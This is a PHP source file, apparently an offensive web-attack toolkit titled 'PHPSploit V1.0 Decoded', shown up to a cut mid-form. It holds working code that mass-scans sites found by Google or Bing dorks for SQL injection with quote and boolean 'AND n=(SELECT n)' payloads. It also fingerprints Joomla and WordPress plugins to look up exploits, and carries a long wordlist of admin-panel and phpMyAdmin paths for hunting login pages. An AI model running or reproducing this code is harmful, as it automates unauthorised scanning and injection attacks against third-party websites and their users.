io.kent

PHPSploit V1.0 Decoded


Posted
<?php
set_time_limit(0);
error_reporting(0);
@ignore_user_abort(true);
ini_set('memory_limit', '128M');

if(@$_GET['webvuln'])
{
//lagripp code
function ask_exploit_db($component){ // searches exploit-db for the given component name and prints the result cell

$ExPloiTdb ="http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$component&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=";

$result = @file_get_contents($ExPloiTdb);

if (@eregi("No results",$result)) {

echo"<td>Not Found</td><td><a href='http://www.google.com/search?hl=en&q=download+$component'>Download</a></td></tr>";

}else{

echo"<td><a href='$ExPloiTdb'>Found ..!</a></td><td><--</td></tr>";

}
}

/**************************************************************/

function get_components($site1){ // scrapes Joomla component names from the page source and checks each one against exploit-db

$source = @file_get_contents($site1);

preg_match_all('{option,(.*?)/}i',$source,$f);
preg_match_all('{option=(.*?)(&|&amp;|")}i',$source,$f2);
preg_match_all('{/components/(.*?)/}i',$source,$f3);

$arz=array_merge($f2[1],$f[1],$f3[1]);

$coms=array();

if(count($arz)==0){ echo "<tr><td colspan=3>[~] Nothing Found ..! , Maybe there is some error site or option ... check it .</td></tr>";}

foreach(array_unique($arz) as $x){

$coms[]=$x;
}

foreach($coms as $comm){

echo "<tr><td>$comm</td>";

ask_exploit_db($comm);

}

}

/**************************************************************/

function get_plugins($site1){ // scrapes WordPress plugin names from the page source and checks each one against exploit-db

$source = @file_get_contents($site1);

preg_match_all("#/plugins/(.*?)/#i", $source, $f);

$plugins=array_unique($f[1]);

if(count($plugins)==0){ echo "<tr><td colspan=3>[~] Nothing Found ..! , Maybe there is some error site or option ... check it .</td></tr>";}

foreach($plugins as $plugin){

echo "<tr><td>$plugin</td>";

ask_exploit_db($plugin);

}

}

/**************************************************************/

function t_header($site1){ // prints the header row of the result table

echo'<table align="center" border="1" width="50%" cellspacing="1" cellpadding="5">';

echo'
<tr id="oo">
<td>Site : <a href="'.$site1.'">'.$site1.'</a></td>
<td>Exploit-db</b></td>
<td>Exploit it !</td>
</tr>
';

}
//-------------- end gripp



// Party vulnerability

$site1=strip_tags(trim($_GET['webvuln']));

t_header($site1);

$url_to_change = $site1;
$www = 'www';
$position = strpos($url_to_change, $www);

if ($position === false) {
$site1 = str_replace("".$site1."", "www.".$site1."", $site1);
} else
{
echo '';
}

if($_GET['what'] == 'joomla')
{
echo get_components("http://".$site1);
}
elseif($_GET['what'] == 'wordpress')
{
echo get_plugins("http://".$site1);
}
}
elseif($_GET['dork'])
{
//////////////// HERE FOR SIMPLE SQLi SITES only, for now
?>



<?php
/* Google dork scanner
* yepss... you know what this is
*
*/


@error_reporting(0);
@set_time_limit(60);

function fetch($url) {
if(!function_exists("curl_init")){
$bu = trim(@file_get_contents($url));
if($bu == "") return "";
else return $bu;
}

$header[] = "Accept-Language: en";
$header[] = "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3";
$header[] = "Connection: Keep-Alive";
$header[] = "Pragma: no-cache";
$header[] = "Cache-Control: no-cache";

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE );
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
curl_setopt($ch, CURLOPT_TIMEOUT, 7);
curl_setopt($ch, CURLOPT_HTTPHEADER, $header);
$content = curl_exec($ch);
curl_close($ch);
return $content;
}

function sqlcheck($url_){
// clean url
$url_ = "http://".trim(str_ireplace("http://","",$url_));
$url_ = str_ireplace("&amp;","&",$url_);
$urls = explode("?",$url_);
// check if url contains querystring
if(count($urls)==2){
$url = $urls[0];
$querys = explode("&",$urls[1]);
foreach($querys as $query){
$vars = explode("=",$query);
//echo $query;
// check if parameter has a numeric value
if((count($vars)>=2) && (is_numeric($vars[1]))){
$final = str_replace($query,$query."%27",$url_);
//echo $final;
$content = fetch($final);
$url_1 = file_get_contents($url_);
$url_2 = file_get_contents($final);
if(preg_match("/sql syntax|sql error|right syntax to use near|Warning|SQL|syntax error converting|unclosed quotation|is not a valid MySQL result/i",$content) OR ($url_1 !== $url_2)){
return $vars[0];

}
}
}
}
return ""; // failed
}
function sqlheavycheck($url_){
// clean url
$url_ = "http://".trim(str_ireplace("http://","",$url_));
$url_ = str_ireplace("&amp;","&",$url_);

// check if url contains querystring
$pos = stripos($url_,"?");
if($pos !== false){
$url = substr($url_,0,$pos);
$que = substr($url_,$pos+1);


$querys = explode("&",$que);
foreach($querys as $query){
$vars = explode("=",$query);
//echo $query;
// check if parameter has a numeric value
if((count($vars)>=2) && (is_numeric($vars[1]))){
// and 1=(select 1)
$acak = rand(1111,9999);
$final = str_replace($query,$query."%20AND%20".$acak."%3D%28SELECT%20".$acak."%29--",$url_);
$contrue = fetch($final);
//echo "final1 : ".$final."<br />";

// and 1=(select 0)
$acak = rand(1111,9999);
$final = str_replace($query,$query."%20AND%20".$acak."%3D%28SELECT%200%29--",$url_);
//echo "final2 : ".$final."<br />";
$confalse = fetch($final);

$numtrue = strlen(strip_tags($contrue));
$numfalse = strlen(strip_tags($confalse));
$selisih = $numtrue - $numfalse;


if($selisih >= 30){
return $vars[0];
}
else{
//' and 1=(select 1) and '1'='1
$acak = rand(1111,9999);
$final = str_replace($query,$query."%27%20AND%20".$acak."%3D%28SELECT%20".$acak."%29%20AND%20%271%27=%271",$url_);
$contrue = fetch($final);
//echo "final1 : ".$final."<br />";

//' and 1=(select 0) and '1'='1
$acak = rand(1111,9999);
$final = str_replace($query,$query."%27%20AND%20".$acak."%3D%28SELECT%200%29%20AND%20%271%27=%271",$url_);
//echo "final2 : ".$final."<br />";
$confalse = fetch($final);

$numtrue = strlen(strip_tags($contrue));
$numfalse = strlen(strip_tags($confalse));
$selisih = $numtrue - $numfalse;

if($selisih >= 30){
return $vars[0];
}
}
}
}
}
return ""; // failed...
}


// debugging tools
if(isset($_GET['check'])&&($_GET['check']!="")){
$url = $_GET['check'];
echo $url." ".sqlcheck($url);
die();
}
if(isset($_GET['heavycheck'])&&($_GET['heavycheck']!="")){
$url = $_GET['heavycheck'];
echo $url." ".sqlheavycheck($url);
die();
}
// debugging tools end


if(isset($_GET['dork'])&&($_GET['dork']!="")){
$gnum = 10; // number of search results per page
$setype = "google"; // default: search using g00gle
if(isset($_GET['setype'])) $setype = strtolower(trim($_GET['setype']));

if(isset($_GET['page'])){
$gpage = (int) $_GET['page'];
if($gpage < 1) $gpage = 1;
}
else $gpage = 1;
$gpage = ($gpage - 1) * $gnum;

if($gpage > ($gpage * $gnum)){
echo "_finish_|max only ".$gpage." results";
die();
}

$dork = stripslashes($_GET['dork']);

$dorkg = "site:".urldecode($dork)." filetype:php";


$dorkb = urldecode("site:".$dork."+php");
$dorkb = str_replace(" ","+",$dorkb);

if($setype == "google"){
for($i=1; $i<3; $i++)
{
$gsearch = fetch("http://www.google.com/search?hl=fr&q=" . urlencode($dorkg) . "&start=$gpage");

$raws = explode("<h3 class=\"r\">",$gsearch);
if((trim($gsearch) == "") || (count($raws) <= 1) || !(preg_match('/<h3 class="r"><a href="(.*?)"/si',$gsearch))){

echo "<font color=#ff0000>[X] ".$setype."</font>";

die();
}
}
}
elseif($setype == "bing"){
for($i=1; $i<3; $i++)
{
$dork = preg_replace("/^[^:]*.*)/i","\\1",$dorkb);
$gsearch = fetch("http://www.bing.com/search?q=".$dorkb."&filt=all&first=".$gpage."&FORM=PERE3");
$raws = explode("<div class=\"sb_tlst\"><h3>",$gsearch);
if((trim($gsearch) == "") || (!preg_match("/class=\"sb_pagN\"/i",$gsearch)) || (count($raws) <= 1)){
echo "<font color=#ff0000>[X] ".$setype."</font>";

die();
}
}
}
else{
echo "Search engine not supported";
die();
}

foreach($raws as $korban){
if(strlen($korban) >= 9 && (substr($korban,0,9)=="<a href=\"")){
$heavy = false;
if((isset($_GET['heavy'])) && ($_GET['heavy']=='1')) $heavy = true;

$calon = substr($korban,9);
$pos = strpos($calon,"\"");
if($pos !== false){
$url = trim(substr($calon,0,$pos));
if(preg_match("/facebook\.|yahoo\.|google\.|youtube\./i",$url)) continue;
if(!preg_match("/\w+=\d+/i",$url)) continue;

if($heavy) {
$vulnvar = sqlheavycheck($url);
if($vulnvar != "") $laporan = "<a href=\"".$url."\" target=\"_".rand(1111,9999)."\"><span class=\"white\">".$url."</span><span class=\"red\"> @ </span><span class=\"white\">".$vulnvar."</span></a><br />";
else $laporan = "<a href=\"".$url."\" target=\"_".rand(1111,9999)."\">".$url."</a><br />";
echo $laporan;

}
else{
$vulnvar = sqlcheck($url);
if($vulnvar != "") $laporan = "<a href=\"".$url."\" target=\"_".rand(1111,9999)."\"><span class=\"white\">".$url."</span><span class=\"red\"> @ </span><span class=\"white\">".$vulnvar."</span></a><br />";
else $laporan = "<a href=\"".$url."\" target=\"_".rand(1111,9999)."\">".$url."</a><br />";
echo $laporan;
}
}
}
}
die(); // mate, why so sluggish...
}
}
else
{


$list['front'] ="admin
team
adm
admincp
admcp
cp
modcp
moderatorcp
adminare
admins
cpanel
controlpanel";
$list['end'] = "admin1.php
team
admin1.html
admin2.php
admin2.html
yonetim.php
yonetim.html
yonetici.php
yonetici.html
ccms/
upload.php
ccms/login.php
ccms/index.php
maintenance/
webmaster/
adm/
configuration/
configure/
websvn/
admin/
admin/account.php
admin/account.html
admin/index.php
admin/index.html
admin/login.php
admin/login.html
admin/home.php
admin/controlpanel.html
admin/controlpanel.php
admin.php
admin.html
admin/cp.php
admin/cp.html
cp.php
cp.html
administrator/
administrator/index.html
administrator/index.php
administrator/login.html
administrator/login.php
administrator/account.html
administrator/account.php
administrator.php
administrator.html
login.php
login.html
modelsearch/login.php
moderator.php
moderator.html
moderator/login.php
moderator/login.html
moderator/admin.php
moderator/admin.html
moderator/
account.php
account.html
controlpanel/
controlpanel.php
controlpanel.html
admincontrol.php
admincontrol.html
adminpanel.php
adminpanel.html
admin1.asp
admin2.asp
yonetim.asp
yonetici.asp
admin/account.asp
admin/index.asp
admin/login.asp
admin/home.asp
admin/controlpanel.asp
admin.asp
admin/cp.asp
cp.asp
administrator/index.asp
administrator/login.asp
administrator/account.asp
administrator.asp
login.asp
modelsearch/login.asp
moderator.asp
moderator/login.asp
moderator/admin.asp
account.asp
controlpanel.asp
admincontrol.asp
adminpanel.asp
fileadmin/
fileadmin.php
fileadmin.asp
fileadmin.html
administration/
administration.php
administration.html
sysadmin.php
sysadmin.html
phpMyAdmin/
phpmyadmin/
PMA/
admin/
dbadmin/
mysql/
myadmin/
phpmyadmin2/
phpMyAdmin2/
phpMyAdmin-2/
php-my-admin/
weMeanYouNoHarm/
V20xRmRRPT0K/
admin/pma/
admin/phpmyadmin/
db/
myadmin/
mysql/
mysqladmin/
typo3/phpmyadmin/
phpadmin/
phpmyadmin1/
web/phpMyAdmin/
xampp/phpmyadmin/
web/
php-my-admin/
websql/
phpMyAdmin-2/
php-my-admin/
phpMyAdmin-2.8.2.1/
phpMyAdmin-2.8.2.2/
phpMyAdmin-2.8.2.3/
phpMyAdmin-2.8.2.4/
phpMyAdmin-2.10.0.0/
phpMyAdmin-2.10.0.1/
phpMyAdmin-2.10.0.2/
phpMyAdmin-2.10.1.0/
phpMyAdmin-2.10.2.0/
phpMyAdmin-2.11.0.0/
phpMyAdmin-2.11.1.0/
phpMyAdmin-2.11.1.1/
phpMyAdmin-2.11.1.2/
phpMyAdmin-2.11.2.0/
phpMyAdmin-2.11.2.1/
phpMyAdmin-2.11.2.2/
phpMyAdmin-2.11.3.0/
phpMyAdmin-2.11.4.0/
phpMyAdmin-2.11.5.0/
phpMyAdmin-2.11.5.1/
phpMyAdmin-2.11.5.2/
phpMyAdmin-2.11.6.0/
phpMyAdmin-2.11.7.0/
phpMyAdmin-2.11.7.1/
phpMyAdmin-2.11.8.0/
phpMyAdmin-2.11.9.0/
phpMyAdmin-2.11.9.1/
phpMyAdmin-2.11.9.2/
phpMyAdmin-2.11.9.3/
phpMyAdmin-2.11.9.4/
phpMyAdmin-3.0.0.0/
phpMyAdmin-3.0.1.0/
phpMyAdmin-3.0.1.1/
phpMyAdmin-3.0.2.0/
phpMyAdmin-3.1.0.0/
phpMyAdmin-3.1.1.0/
phpMyAdmin-3.1.2.0/
phpMyAdmin-3.1.3.0/
phpMyAdmin-2.9.0-rc1/
phpMyAdmin-2.9.0/
phpMyAdmin-2.9.0.1/
phpMyAdmin-2.9.0.2/
phpMyAdmin-2.9.1/
phpMyAdmin-2.9.2/
phpMyAdmin-3.4.3.1-all-languages/
phpMyAdmin-3.4.3.1-english/
phpMyAdmin-3.4.3.1/
sqlmanager/
mysqlmanager/
p/m/a/
PMA2005/
pma2005/
pma2006/
pma2007/
pma2008/
pma2009/
phpmanager/
php-myadmin/
phpmy-admin/
webadmin/
sqlweb/
websql/
webdb/
mysqladmin/
mysql-admin/
databaseadmin/
admm/
admn/
w00tw00t.at.blackhats.romanian.anti-sec:)/
phpMyAdmin/scripts/setup.php/
phpmyadmin/scripts/setup.php/
pma/scripts/setup.php/
myadmin/scripts/setup.php/
MyAdmin/scripts/setup.php/
phpmyadmin/scripts/setup.php/
phpMyAdmin/scripts/setup.php/
phpMyAdmin-2.2.3/
phpMyAdmin-2.2.6/
phpMyAdmin-2.5.1/
phpMyAdmin-2.5.4/
phpMyAdmin-2.5.5-rc1/
phpMyAdmin-2.5.5-rc2/
phpMyAdmin-2.5.5/
phpMyAdmin-2.5.5-pl1/
phpMyAdmin-2.5.6-rc1/
phpMyAdmin-2.5.6-rc2/
phpMyAdmin-2.5.6/
phpMyAdmin-2.5.7/
phpMyAdmin-2.5.7-pl1/
phpMyAdmin-2.6.0-alpha/
phpMyAdmin-2.6.0-alpha2/
phpMyAdmin-2.6.0-beta1/
phpMyAdmin-2.6.0-beta2/
phpMyAdmin-2.6.0-rc1/
phpMyAdmin-2.6.0-rc2/
phpMyAdmin-2.6.0-rc3/
phpMyAdmin-2.6.0/
phpMyAdmin-2.6.0-pl1/
phpMyAdmin-2.6.0-pl2/
phpMyAdmin-2.6.0-pl3/
phpMyAdmin-2.6.1-rc1/
phpMyAdmin-2.6.1-rc2/
phpMyAdmin-2.6.1/
phpMyAdmin-2.6.1-pl1/
phpMyAdmin-2.6.1-pl2/
phpMyAdmin-2.6.1-pl3/
phpMyAdmin-2.6.2-rc1/
phpMyAdmin-2.6.2-beta1/
phpMyAdmin-2.6.2-rc1/
phpMyAdmin-2.6.2/
phpMyAdmin-2.6.2-pl1/
phpMyAdmin-2.6.3/
phpMyAdmin-2.6.3-rc1/
phpMyAdmin-2.6.3/
phpMyAdmin-2.6.3-pl1/
phpMyAdmin-2.6.4-rc1/
phpMyAdmin-2.6.4-pl1/
phpMyAdmin-2.6.4-pl2/
phpMyAdmin-2.6.4-pl3/
phpMyAdmin-2.6.4-pl4/
phpMyAdmin-2.6.4/
phpMyAdmin-2.7.0-beta1/
phpMyAdmin-2.7.0-rc1/
phpMyAdmin-2.7.0-pl1/
phpMyAdmin-2.7.0-pl2/
phpMyAdmin-2.7.0/
phpMyAdmin-2.8.0-beta1/
phpMyAdmin-2.8.0-rc1/
phpMyAdmin-2.8.0-rc2/
phpMyAdmin-2.8.0/
phpMyAdmin-2.8.0.1/
phpMyAdmin-2.8.0.2/
phpMyAdmin-2.8.0.3/
phpMyAdmin-2.8.0.4/
phpMyAdmin-2.8.1-rc1/
phpMyAdmin-2.8.1/
phpMyAdmin-2.8.2/
sqlmanager/
mysqlmanager/
p/m/a/
PMA2005/
pma2005/
phpmanager/
php-myadmin/
phpmy-admin/
webadmin/
sqlweb/
websql/
webdb/
mysqladmin/
mysql-admin/
myadmin/
sysadmin.asp
sysadmin/
ur-admin.asp
ur-admin.php
ur-admin.html
ur-admin/
Server.php
Server.html
Server.asp
Server/
wp-admin/
administr8.php
administr8.html
administr8/
administr8.asp
webadmin/
webadmin.php
webadmin.asp
webadmin.html
administratie/
admins/
admins.php
admins.asp
admins.html
administrivia/
Database_Administration/
WebAdmin/
useradmin/
sysadmins/
admin1/
system-administration/
administrators/
pgadmin/
directadmin/
staradmin/
ServerAdministrator/
SysAdmin/
administer/
LiveUser_Admin/
sys-admin/
typo3/
panel/
cpanel/
cPanel/
cpanel_file/
platz_login/
rcLogin/
blogindex/
formslogin/
autologin/
support_login/
meta_login/
manuallogin/
simpleLogin/
loginflat/
utility_login/
showlogin/
memlogin/
members/
login-redirect/
sub-login/
wp-login/
login1/
dir-login/
login_db/
xlogin/
smblogin/
customer_login/
UserLogin/
login-us/
acct_login/
admin_area/
bigadmin/
project-admins/
phppgadmin/
pureadmin/
sql-admin/
radmind/
openvpnadmin/
wizmysqladmin/
vadmind/
ezsqliteadmin/
hpwebjetadmin/
newsadmin/
adminpro/
Lotus_Domino_Admin/
bbadmin/
vmailadmin/
Indy_admin/
ccp14admin/
irc-macadmin/
banneradmin/
sshadmin/
phpldapadmin/
macadmin/
administratoraccounts/
admin4_account/
admin4_colon/
radmind-1/
Super-Admin/
AdminTools/
cmsadmin/
SysAdmin2/
globes_admin/
cadmins/
phpSQLiteAdmin/
navSiteAdmin/
server_admin_small/
logo_sysadmin/
server/
database_administration/
power_user/
system_administration/
ss_vms_admin_sm/
adminarea/
bb-admin/
adminLogin/
panel-administracion/
instadmin/
memberadmin/
administratorlogin/
admin/admin.php
admin_area/admin.php
admin_area/login.php
siteadmin/login.php
siteadmin/index.php
siteadmin/login.html
admin/admin.html
admin_area/index.php
bb-admin/index.php
bb-admin/login.php
bb-admin/admin.php
admin_area/login.html
admin_area/index.html
admincp/index.asp
admincp/login.asp
admincp/index.html
webadmin/index.html
webadmin/admin.html
webadmin/login.html
admin/admin_login.html
admin_login.html
panel-administracion/login.html
nsw/admin/login.php
webadmin/login.php
admin/admin_login.php
admin_login.php
admin_area/admin.html
pages/admin/admin-login.php
admin/admin-login.php
admin-login.php
bb-admin/index.html
bb-admin/login.html
bb-admin/admin.html
admin/home.html
pages/admin/admin-login.html
admin/admin-login.html
admin-login.html
admin/adminLogin.html
adminLogin.html
home.html
rcjakar/admin/login.php
adminarea/index.html
adminarea/admin.html
webadmin/index.php
webadmin/admin.php
user.html
modelsearch/login.html
adminarea/login.html
panel-administracion/index.html
panel-administracion/admin.html
modelsearch/index.html
modelsearch/admin.html
admincontrol/login.html
adm/index.html
adm.html
user.php
panel-administracion/login.php
wp-login.php
adminLogin.php
admin/adminLogin.php
home.php
adminarea/index.php
adminarea/admin.php
adminarea/login.php
panel-administracion/index.php
panel-administracion/admin.php
modelsearch/index.php
modelsearch/admin.php
admincontrol/login.php
adm/admloginuser.php
admloginuser.php
admin2/login.php
admin2/index.php
adm/index.php
adm.php
affiliate.php
adm_auth.php
memberadmin.php
administratorlogin.php
admin/admin.asp
admin_area/admin.asp
admin_area/login.asp
admin_area/index.asp
bb-admin/index.asp
bb-admin/login.asp
bb-admin/admin.asp
pages/admin/admin-login.asp
admin/admin-login.asp
admin-login.asp
user.asp
webadmin/index.asp
webadmin/admin.asp
webadmin/login.asp
admin/admin_login.asp
admin_login.asp
panel-administracion/login.asp
adminLogin.asp
admin/adminLogin.asp
home.asp
adminarea/index.asp
adminarea/admin.asp
adminarea/login.asp
panel-administracion/index.asp
panel-administracion/admin.asp
modelsearch/index.asp
modelsearch/admin.asp
admincontrol/login.asp
adm/admloginuser.asp
admloginuser.asp
admin2/login.asp
admin2/index.asp
adm/index.asp
adm.asp
affiliate.asp
adm_auth.asp
memberadmin.asp
administratorlogin.asp
siteadmin/login.asp
siteadmin/index.asp
ADMIN/
paneldecontrol/
login/
cms/
admon/
ADMON/
administrador/
ADMIN/login.php
panelc/
ADMIN/login.html
admin.php
login.htm
login.html
login/
login.php
adm/
admin/
admin/account.html
admin/login.html
admin/login.htm
admin/home.php
admin/controlpanel.html
admin/controlpanel.htm
admin/cp.php
admin/adminLogin.html
admin/adminLogin.htm
admin/admin_login.php
admin/controlpanel.php
admin/admin-login.php
admin-login.php
admin/account.php
admin/admin.php
admin.htm
admin.html
adminitem/
adminitem.php
adminitems/
adminitems.php
administrator/
administrator/login.php
administrator.php
administration/
administration.php
adminLogin/
adminlogin.php
admin_area/admin.php
admin_area/
admin_area/login.php
manager/
manager.php
letmein/
letmein.php
superuser/
superuser.php
access/
access.php
sysadm/
sysadm.php
superman/
supervisor/
panel.php
control/
control.php
member/
member.php
members/
members.php
user/
user.php
cp/
uvpanel/
manage/
manage.php
management/
management.php
signin/
signin.php
log-in/
log-in.php
log_in/
log_in.php
sign_in/
sign_in.php
sign-in/
sign-in.php
users/
users.php
accounts/
accounts.php
wp-login.php
bb-admin/login.php
bb-admin/admin.php
bb-admin/admin.html
administrator/account.php
relogin.htm
relogin.html
check.php
relogin.php
processlogin.php
checklogin.php
checkuser.php
checkadmin.php
isadmin.php
authenticate.php
authentication.php
auth.php
authuser.php
authadmin.php
cp.php
modelsearch/login.php
moderator.php
moderator/
controlpanel/
controlpanel.php
admincontrol.php
adminpanel.php
fileadmin/
fileadmin.php
sysadmin.php
admin1.php
admin1.html
admin1.htm
admin2.php
admin2.html
yonetim.php
yonetim.html
yonetici.php
yonetici.html
phpmyadmin/
myadmin/
ur-admin.php
ur-admin/
Server.php
Server/
wp-admin/
administr8.php
administr8/
webadmin/
webadmin.php
administratie/
admins/
admins.php
administrivia/
Database_Administration/
useradmin/
sysadmins/
admin1/
system-administration/
administrators/
pgadmin/
directadmin/
staradmin/
ServerAdministrator/
SysAdmin/
administer/
LiveUser_Admin/
sys-admin/
typo3/
panel/
cpanel/
cpanel_file/
platz_login/
rcLogin/
blogindex/
formslogin/
autologin/
support_login/
meta_login/
manuallogin/
simpleLogin/
loginflat/
utility_login/
showlogin/
memlogin/
login-redirect/
sub-login/
wp-login/
login1/
dir-login/
login_db/
xlogin/
smblogin/
customer_login/
UserLogin/
login-us/
acct_login/
bigadmin/
project-admins/
phppgadmin/
pureadmin/
sql-admin/
radmind/
openvpnadmin/
wizmysqladmin/
vadmind/
ezsqliteadmin/
hpwebjetadmin/
newsadmin/
adminpro/
Lotus_Domino_Admin/
bbadmin/
vmailadmin/
Indy_admin/
ccp14admin/
irc-macadmin/
banneradmin/
sshadmin/
phpldapadmin/
macadmin/
administratoraccounts/
admin4_account/
admin4_colon/
radmind-1/
Super-Admin/
AdminTools/
cmsadmin/
SysAdmin2/
globes_admin/
cadmins/
phpSQLiteAdmin/
navSiteAdmin/
server_admin_small/
logo_sysadmin/
power_user/
system_administration/
ss_vms_admin_sm/
bb-admin/
panel-administracion/
instadmin/
memberadmin/
administratorlogin/
adm.php
admin_login.php
panel-administracion/login.php
pages/admin/admin-login.php
pages/admin/
acceso.php
admincp/login.php
admincp/
adminarea/
admincontrol/
affiliate.php
adm_auth.php
memberadmin.php
administratorlogin.php
modules/admin/
administrators.php
siteadmin/
siteadmin.php
adminsite/
kpanel/
vorod/
vorod.php
vorud/
vorud.php
adminpanel/
PSUser/
secure/
webmaster/
webmaster.php
autologin.php
userlogin.php
admin_area.php
cmsadmin.php
security/
usr/
root/
secret/
admin/login.php
admin/adminLogin.php
moderator.php
moderator.html
moderator/login.php
moderator/admin.php
yonetici.php
0admin/
0manager/
aadmin/
cgi-bin/login.php
login1.php
login_admin/
login_admin.php
login_out/
login_out.php
login_user.php
loginerror/
loginok/
loginsave/
loginsuper/
loginsuper.php
login.php
logout/
logout.php
secrets/
super1/
super1.php
super_index.php
super_login.php
supermanager.php
superman.php
superuser.php
supervise/
supervise/Login.php
super.php";





function template() {
echo '
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>PHPSploit V1.0 Decoded By MegaBedder</title>

<style type="text/css">
h1.technique-two {
width: 405px; height: 120px;

margin: 0 auto;
}
body{
background: #070707;
background-image: url("http://www.easy-upload.net/fichiers/stalker-21-stalccccccker-jeux-video.20111184848.jpg");
margin: 0;
padding: 0;
background-attachment:fixed;
color: #FFF;
font-family: Calibri;
font-size: 13px;
}
a{
color: #FFF;
text-decoration: none;
font-weight: bold;
}
.wrapper{
width: 1000px;
margin: 0 auto;
}
.tube{
padding: 10px;
}
.red{
width: 490px;
border: 1px solid #555;
background: #333;
color: #FFF
}
.red input{
background: #000;
border: 1px solid #555;
color: #FFF;
}
.blue{

float: left;
width: 500px;
border: 1px solid #1d7fc3;
background: #191919;
color: #1d7fc3;
}
.yellow{
position:absolute;
margin-left: 510px;
float: right;
width: 480px;
border: 1px solid #FFBF00;
background: #191919;
color: #FFBF00;
}
.green{
float: left;
width: 490px;
border: 1px solid #5fd419;

background: #191919;
color: #5fd419;
}

input,select,textarea{
border:0;
border:1px solid #900;
color:#fff;
background:#000;
margin:0;
padding:2px 4px;
}
input:hover,textarea:hover,select:hover{
background:#200;
border:1px solid #f00;
}
option{
background:#000;
}

.white{
color:#fff;
}


#status{
width:100%;
height:auto;
padding:4px 0;
border-bottom:1px solid #300;
}
#result a{
color:#777;
}
.sign{
color:#222;
}
#box{
margin:10px 0 0 0;
}
</style>
<script type="text/javascript">
<!--
function insertcode($text, $place, $replace)
{
var $this = $text;
var logbox = document.getElementById($place);
if($replace == 0)
document.getElementById($place).innerHTML = logbox.innerHTML+$this;
else
document.getElementById($place).innerHTML = $this;
//document.getElementById("helpbox").innerHTML = $this;
}
-->
</script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>';
?>



<!-- <?php echo date("Y",time()); ?> Revan Aditya -->
<script type="text/javascript">
jalan = false;
nomer = 1;
nomermax = 100;
heavy = false;

function ajax(vars, nom, cbFunction){
var req = window.XMLHttpRequest ? new XMLHttpRequest() : new ActiveXObject("MSXML2.XMLHTTP.3.0");
var querystring = '?' + vars + '&page=' + nom;
req.open("GET", querystring , true);
req.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
req.onreadystatechange = function(){
if (req.readyState == 4 && req.status == 200){
if (req.responseText){
cbFunction(req.responseText,vars);
}
}
}
req.send(null);
}
function showResult(str, vars){
var box = document.getElementById("result")
if(str.match(/Warning|Fatal/gi)) box.innerHTML += '<span class=\"red\">*** </span> error...<br />';
else box.innerHTML += str;

if(!jalan){
box.innerHTML += '<span class=\"red\">*** </span> paused...<br />';
document.getElementById("loading").style.visibility = 'hidden';
document.getElementById("btnOk").value = "Resume";
}
else {
if(!str.match(/.*finish.*/gi)){
sqlCheck(vars);
}
else{
var pesan = str.substring(str.indexOf("|") + 1);
box.innerHTML = '<span class=\"red\">*** </span> finish ( ' + pesan + ' )<br />';
document.getElementById('setype').disabled = false;
document.getElementById('dork').readOnly = false;
document.getElementById("loading").style.visibility = 'hidden';
document.getElementById("btnOk").value = "Search";
nomer = 1;
jalan = false;
}
}

var oldYPos = 0, newYPos = 0;
do{
if (document.all){
oldYPos = document.body.scrollTop;
}
else{
oldYPos = window.pageYOffset;
}
window.scrollBy(0, 50);
if (document.all){
newYPos = document.body.scrollTop;
}
else{
newYPos = window.pageYOffset;
}
} while (oldYPos < newYPos);
}
function keyHandler(ev){
if (!ev){
ev = window.event;
}
if (ev.which){
keycode = ev.which;
}
else if (ev.keyCode){
keycode = ev.keyCode;
}
if (keycode == 13){
sikat();
}
}
String.prototype.trim = function() {
return this.replace(/^\s*|\s*$/g, "");
}
function sqlCheck(xdata){
if(jalan){
ajax(xdata, nomer, showResult);
nomer++;
}
}
function sqlHeavyCheck(xdata){
if(jalan){
ajax(xdata + '&heavy=1', nomer, showResult);
nomer++;
}
}
function sikat(){
var btext = document.getElementById("btnOk");
if((btext.value == 'Search') || (btext.value == 'Resume')){
if(!jalan){
if(btext.value == 'Search') nomer = 1;
var target = document.getElementById('dork');
var setype = document.getElementById('setype');
if(target.value.trim().length>0) {
document.getElementById("loading").style.visibility = 'visible';
document.getElementById("btnOk").value = "Pause";
target.readOnly = true;
setype.disabled = true;
jalan = true;
sqlCheck('dork=' + encodeURIComponent(target.value) + '&setype=' + encodeURIComponent(setype.value));
}
}
else alert("Please stop first...");
}
else {
berhenti();
}
}
function initpg(){
document.onkeypress = keyHandler;
}
function berhenti(){
jalan = false;
}
function bersih(){
var tanya = confirm("Clear results and restart?");
if(tanya == true) location.href = 'adm.php';
}
function checkheavy_fix(){
var heavyval = document.getElementById("heavy");
if(heavyval.checked) heavyval.checked = false;
else heavyval.checked = true;
checkheavy();
}
function checkheavy(){
var heavyval = document.getElementById("heavy").checked;
var box = document.getElementById("result")
if(heavyval) {
heavy = true;
box.innerHTML += '<span class=\"red\">*** </span> depth scan...<br />';
}
else {
heavy = false;
box.innerHTML += '<span class=\"red\">*** </span> quick scan...<br />';
}
}

</script>


<?php


echo '
</head>
<body>
<br />
<br />
<h1 class="technique-two">



</h1>

<div class="wrapper">
<table><tr><td>
<div class="red">
<div class="tube">
<table width=100% style="background: #222; border: 1px solid #111;"><tr><td align=left><table><tr><td><img src="http://cdn4.iconfinder.com/data/icons/socialmediaicons_v120/32/website.png"></td><td><center><b>WebSite Party</b></center></td></table></table><br>

<form action="" method="post" name="xploit_form">
URL:<br /><input type="text" name="xploit_url" value="'.$_POST['xploit_url'].'" style="width: 100%;" /><br /><br />
404 error page:<br /><input type="text" name="xploit_404string" value="'.$_POST['xploit_404string'].'" style="width: 100%;" /><br /><br />


